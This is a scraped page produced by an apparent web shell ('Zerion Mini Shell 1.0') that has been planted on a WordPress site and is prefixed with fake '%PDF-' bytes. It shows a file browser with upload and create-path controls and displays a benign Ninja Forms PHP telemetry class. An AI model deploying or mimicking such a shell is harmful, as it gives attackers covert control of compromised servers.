%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/includes/Telemetry/
Upload File :
Create Path :
Current File : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/includes/Telemetry/MaxMetric.php

<?php

class NF_Telemetry_MaxMetric extends NF_Telemetry_Metric
{
    public function update( $value )
    {
        $old_max = $this->get();
        $new_max = max( $old_max, $value );
        return $this->save( $new_max );
    }
}

Zerion Mini Shell 1.0